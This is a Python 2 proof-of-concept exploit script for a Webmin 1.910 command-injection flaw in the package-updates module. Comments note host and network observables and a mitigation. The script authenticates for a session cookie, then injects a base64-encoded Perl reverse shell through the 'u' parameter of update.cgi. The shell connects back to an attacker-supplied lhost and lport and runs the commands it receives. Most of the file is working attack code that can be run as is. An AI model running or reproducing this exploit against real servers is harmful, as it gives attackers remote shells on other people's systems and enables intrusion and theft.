webmin_exploit.py
#!/usr/bin/env python2
# -*- coding: utf8 -*-
# Proof-of-concept for the Webmin 1.910 remote code execution issue in the
# package-updates module.  Python 2 only: it relies on the `print` statement
# and on `str.encode('base64')`, neither of which exists in Python 3.
#
# Flow as written below: authenticate against session_login.cgi to obtain a
# "sid" session cookie, then POST a package name that carries a shell pipe to
# package-updates/update.cgi.  Valid Webmin credentials are required
# (--password is mandatory and a failed login exits).
#
# Defender notes:
#   * Host-side observable: an authenticated POST to package-updates/update.cgi
#     whose `u` parameter contains shell metacharacters (here "| bash -c" with
#     a base64-encoded command), shortly after a POST to session_login.cgi.
#   * Network-side observable: an outbound TCP connection from the Webmin host
#     to the attacker-supplied lhost:lport.
#   * Mitigation: run a Webmin release that fixes this issue and keep the
#     Webmin port off untrusted networks.
import requests
import urllib3
urllib3.disable_warnings()  # silence the InsecureRequestWarning caused by verify=False below
import argparse
import sys
from termcolor import colored
# Command-line interface.  Note that --ssl is parsed as a free-form string and
# only compared against a handful of "truthy" spellings further down.
arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
args = arg_parser.parse_args()
# proxy set for test
# NOTE: this dict is never passed to either requests.post() call below, so it
# currently has no effect on the traffic.
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
# retrieve the Cookies sid:
print colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('****************************** Retrieve Cookies sid *****************************************', "blue")
# Form fields of Webmin's login page; `page` is left empty.
req={'page':'','user':args.user,'pass':args.password}
# Build the base URL; scheme depends on the --ssl flag, everything else on
# --rhost/--rport/--TARGETURI.
if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
    url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
else:
    url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
# Log in.  verify=False disables certificate validation, so over HTTPS the
# credentials are sent to whatever endpoint answers, unauthenticated.
# The "testing" cookie is presumably what the login form expects to be set
# before it issues a session — TODO confirm against Webmin's session_login.cgi.
# allow_redirects=False keeps the response that carries the Set-Cookie header.
resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
# Webmin answers with this text when it is contacted over plain HTTP while
# running in SSL mode; the user has to re-run with --SSL.
if "This web server is running in SSL mode" in resu.content:
    print colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red")
    print(resu.content)
    sys.exit(1)
# Extract the session id: take the value between the first '=' and the
# following ';' of the Set-Cookie header.  The header is indexed directly,
# so a response without Set-Cookie raises KeyError rather than the
# friendly error below.
if "sid" in resu.headers['Set-Cookie']:
    sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
    print("\n")
    print colored('********** [+] [Exploit] The Cookie is '+sid, "green")
else:
    print colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red")
    sys.exit(1)
print("")
print colored('********************************************************************************************', "blue")
print colored('****************************** Create payload and Exploit ***********************************', "blue")
print("\n")
# Templateofthe payload
# Perl one-liner that connects back to --lhost:--lport and runs whatever it
# reads from that socket via system().  This is the command the listener
# on lhost:lport will see connecting in.
template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
# Python 2's 'base64' codec wraps its output at 76 columns; the newlines are
# stripped so the value survives inside a single shell token.
b64payload = template.encode('base64').replace('\n', '').strip()
# Shell pipe that is appended to the package name sent to update.cgi.
payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
## request the payload
# `u` is sent twice (requests encodes a list as repeated form keys): once as
# a legitimate-looking package name and once as the injected payload.
req={'u':['acl/apt',payload]}
# Referer points at the package-updates page, presumably to satisfy Webmin's
# referer check on CGI requests — confirm against the target's configuration.
headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
# Timeouts and connection errors are deliberately ignored: the injected
# command presumably holds the request open, so neither outcome tells us
# whether the shell connected back.
try:
    resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
except requests.Timeout:
    pass
except requests.ConnectionError:
    pass
print('\n')
print colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green")